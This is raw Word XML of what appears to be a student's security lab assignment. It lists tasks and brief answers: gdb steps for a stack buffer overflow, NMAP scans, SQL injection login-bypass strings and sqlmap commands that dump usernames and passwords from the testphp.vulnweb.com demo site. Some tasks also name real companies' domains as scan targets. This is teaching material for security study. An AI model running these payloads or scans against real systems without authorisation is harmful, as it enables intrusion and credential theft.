          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403567E0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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDECFEB" w14:textId="1DF420CA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thirteen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB5885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gcc -fno-stack-protector -o test test.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF9A3E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gdb test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D11A4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break main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270AA79B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECCB5C8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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6696A4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disas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ADFB60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x/20xw $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D917DFF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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B7DAC" w14:textId="26D831E5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(enter client’s name more than max 10 characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353107C0" w14:textId="77F93B63" w:rsidR="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3503298B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555D7656" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00C9432F" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6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C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91ADF6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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CBA5B6" w14:textId="5C6B411F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thirteen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A10DF6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gcc -o attack attack.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A15DDA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./attack | ./test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000D" w14:textId="019A329D" w:rsidR="006771B7" w:rsidRDefault="006771B7" w:rsidP="00AE17F6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0A412F5" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6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000000E" w14:textId="268B92A2" w:rsidR="006771B7" w:rsidRDefault="005C14A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}Utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="009F391C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a port scan on the network of "Telecommunications Company". </w:t>
      </w:r>
      <w:r w:rsidR="00363590">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00CA2689" w:rsidRPr="000E37B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.similarweb.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00363590">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5C04F" w14:textId="571C2533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Same as 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34FC29" w14:textId="77777777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000000F" w14:textId="2ED8AF83" w:rsidR="006771B7" w:rsidRDefault="00903E3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}Conduct a </w:t>
      </w:r>
      <w:r w:rsidRPr="0008404A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dictionary attack password cracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack on the BWAPP. Username - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>vuStudent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642DE75" w14:textId="77777777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</w:p>
    <w:p w14:paraId="00000010" w14:textId="1E68A041" w:rsidR="006771B7" w:rsidRDefault="00903E3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}Perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00903E37">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>penetration testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the network infrastructure of "Healthcare Provider", identifying and exploiting vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB066BF" w14:textId="0CA7E285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(SET) same as 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6859FF" w14:textId="77777777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</w:p>
    <w:p w14:paraId="00000011" w14:textId="53C47EAB" w:rsidR="006771B7" w:rsidRDefault="005C14A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  <w:r w:rsidRPr="004A060D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Investigate vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00F230FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in "Online Learning Management System", focusing on input validation and output encoding. </w:t>
      </w:r>
      <w:r w:rsidR="004A060D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(NMAP)</w:t>
      </w:r>
      <w:r w:rsidR="00363590">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00CA2689" w:rsidRPr="000E37B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.zoho.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00363590">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A5ECC" w14:textId="77777777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Same as 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35484434" w14:textId="1593BB9D" w:rsidR="00CA2689" w:rsidRPr="00F230FC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0000012" w14:textId="1C7CF9F7" w:rsidR="006771B7" w:rsidRPr="00427349" w:rsidRDefault="00000000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427349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement a stack buffer overflow attack.</w:t>
      </w:r>
      <w:r w:rsidR="00427EC4" w:rsidRPr="00427349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(normal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01389947" w14:textId="77777777" w:rsidR="00CA2689" w:rsidRPr="005C14A7" w:rsidRDefault="00CA2689" w:rsidP="00CA2689">
      <w:pPr>
        <w:ind w:left="644"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000013" w14:textId="6868C679" w:rsidR="006771B7" w:rsidRDefault="005C14A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}Utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="009F391C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a port scan on the network of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>"Retail Chain"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363590">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(moreretail.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5692A2F6" w14:textId="77777777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Same as 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40E1C7" w14:textId="5282A5F6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00000014" w14:textId="1BC63840" w:rsidR="006771B7" w:rsidRDefault="00903E3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}Perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00032743">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>penetration testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>E-Commerce Platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" to identify vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00032743">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(amazon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507072C3" w14:textId="2F73E4D0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Same as 10 (SET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000015" w14:textId="23A4128F" w:rsidR="006771B7" w:rsidRDefault="005C14A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}Utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="009F391C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform an port scan on the network of Altoro Mutual - </w:t>
      </w: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http://altoro.testfire.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> , identifying potential security risks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F583F87" w14:textId="711959BA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Same as 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371B06B" w14:textId="77777777" w:rsidR="00CA2689" w:rsidRDefault="00CA2689" w:rsidP="00CA2689">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000016" w14:textId="018698E4" w:rsidR="006771B7" w:rsidRDefault="005C14A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}Utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="009F391C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a detailed  port scan on the network of testphp.vulnweb.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC8631" w14:textId="5E55288F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Same as 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43637550" w14:textId="77777777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</w:p>
    <w:p w14:paraId="00000017" w14:textId="59C2A87A" w:rsidR="006771B7" w:rsidRDefault="00903E3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}Perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00903E37">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>penetration testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>"Customer Support Ticketing System"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify vulnerabilities, such as XSS and CSRF vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A82AAA" w14:textId="7DD32356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Same as 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1045A23C" w14:textId="77777777" w:rsidR="00CA2689" w:rsidRDefault="00CA2689" w:rsidP="00CA2689">
      <w:pPr>
        <w:ind w:left="644"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000018" w14:textId="394CFE40" w:rsidR="006771B7" w:rsidRDefault="00903E3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}Find a way to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F230FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log in as an admin without using the correct password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the "User Login Page" of Altoro Mutual - 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http://altoro.testfire.net/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Explain how you did it and how this could be prevented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE47586" w14:textId="2CFA91DF" w:rsidR="0071559F" w:rsidRDefault="0071559F" w:rsidP="0071559F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Username:Admin;</w:t>
      </w:r>
      <w:r w:rsidRPr="0071559F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="0071559F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00DF60AA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      / admin’--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF34D5" w14:textId="55C72667" w:rsidR="0071559F" w:rsidRDefault="0071559F" w:rsidP="0071559F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Password:anything</w:t>
      </w:r>
      <w:r w:rsidR="00903E37">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7D355" w14:textId="77777777" w:rsidR="00CA2689" w:rsidRDefault="00CA2689" w:rsidP="0071559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5ADEB06" w14:textId="0E038D36" w:rsidR="00B57731" w:rsidRDefault="00903E37" w:rsidP="00B57731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  <w:r w:rsidRPr="00F230FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Retrieve all user data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the "Customer Database" of Acuart website - </w:t>
      </w:r>
      <w:hyperlink r:id="rId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http://testphp.vulnweb.com/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ; Explain ho w</w:t>
      </w:r>
      <w:r w:rsidR="0003274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 accomplished this and suggest a method to stop this unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418B1F20" w14:textId="77777777" w:rsidR="00CA2689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sqlmap testphp.vulnweb.com/artists?artist=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728017A1" w14:textId="76B774D9" w:rsidR="007B71DE" w:rsidRDefault="007B71DE" w:rsidP="007B71DE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sqlmap -u  testphp.vulnweb.com/artists?artist=1 -dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDAA06" w14:textId="527CE8A1" w:rsidR="007B71DE" w:rsidRDefault="007B71DE" w:rsidP="007B71DE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sqlmap -u  testphp.vulnweb.com/artists?artist=1 -D acuart -tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF55297" w14:textId="321FBFDC" w:rsidR="007B71DE" w:rsidRDefault="007B71DE" w:rsidP="007B71DE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sqlmap -u  testphp.vulnweb.com/artists?artist=1 -D acuart -T users -columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9C72C" w14:textId="5F8A3C48" w:rsidR="007B71DE" w:rsidRDefault="007B71DE" w:rsidP="007B71DE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sqlmap -u  testphp.vulnweb.com/artists?artist=1 -D acuart -T users -C uname -dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE062F" w14:textId="4244755D" w:rsidR="007B71DE" w:rsidRDefault="007B71DE" w:rsidP="007B71DE">
      <w:pPr>
        <w:ind w:left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sqlmap -u  testphp.vulnweb.com/artists?artist=1 -D acuart -T users -C pass -dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C867DF0" w14:textId="37176058" w:rsidR="00CA2689" w:rsidRPr="00032743" w:rsidRDefault="00CA2689" w:rsidP="00CA2689">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348BD125" w14:textId="735A7D91" w:rsidR="00682E58" w:rsidRDefault="00682E58" w:rsidP="00B57731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00682E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0268D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CE05310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893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1B7"/>
    <w:rsid w:val="00032743"/>
    <w:rsid w:val="00047AEE"/>
    <w:rsid w:val="0008404A"/>
    <w:rsid w:val="000E1CB5"/>
    <w:rsid w:val="002227D4"/>
    <w:rsid w:val="00292747"/>
    <w:rsid w:val="00363590"/>
    <w:rsid w:val="003F614A"/>
    <w:rsid w:val="00411715"/>
    <w:rsid w:val="00424AC2"/>
    <w:rsid w:val="00427349"/>
    <w:rsid w:val="00427EC4"/>
    <w:rsid w:val="004A060D"/>
    <w:rsid w:val="004E02A2"/>
    <w:rsid w:val="004E6CD8"/>
    <w:rsid w:val="004F36FE"/>
    <w:rsid w:val="005C14A7"/>
    <w:rsid w:val="006771B7"/>
    <w:rsid w:val="00682E58"/>
    <w:rsid w:val="00707300"/>
    <w:rsid w:val="0071559F"/>
    <w:rsid w:val="00731539"/>
    <w:rsid w:val="007646E9"/>
    <w:rsid w:val="007B71DE"/>
    <w:rsid w:val="008306EB"/>
    <w:rsid w:val="008404FF"/>
    <w:rsid w:val="008C18B3"/>
    <w:rsid w:val="008D741F"/>
    <w:rsid w:val="00903E37"/>
    <w:rsid w:val="00920515"/>
    <w:rsid w:val="0092197E"/>
    <w:rsid w:val="00924992"/>
    <w:rsid w:val="009A187A"/>
    <w:rsid w:val="009E3126"/>
    <w:rsid w:val="009F25C2"/>
    <w:rsid w:val="009F391C"/>
    <w:rsid w:val="00A33051"/>
    <w:rsid w:val="00A61639"/>
    <w:rsid w:val="00AB049D"/>
    <w:rsid w:val="00AE17F6"/>
    <w:rsid w:val="00B57731"/>
    <w:rsid w:val="00C33783"/>
    <w:rsid w:val="00C9432F"/>
    <w:rsid w:val="00CA2689"/>
    <w:rsid w:val="00CB2757"/>
    <w:rsid w:val="00CE02EB"/>
    <w:rsid w:val="00D256BF"/>
    <w:rsid w:val="00D551B6"/>
    <w:rsid w:val="00D659E8"/>
    <w:rsid w:val="00D948F7"/>
    <w:rsid w:val="00DF60AA"/>
    <w:rsid w:val="00E4420F"/>
    <w:rsid w:val="00E63C07"/>
    <w:rsid w:val="00F230FC"/>
    <w:rsid w:val="00F34E92"/>
    <w:rsid w:val="00FB549B"/>
    <w:rsid w:val="00F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F48D"/>
  <w15:docId w15:val="{5B99D40E-DEC0-4170-A9BE-1DA7B30C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3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6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oro.testfir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toro.testfir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oh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imilarwe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stphp.vulnweb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19</Pages>
  <Words>2440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mariyam.patel1604@gmail.com</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T07:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-30T18:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>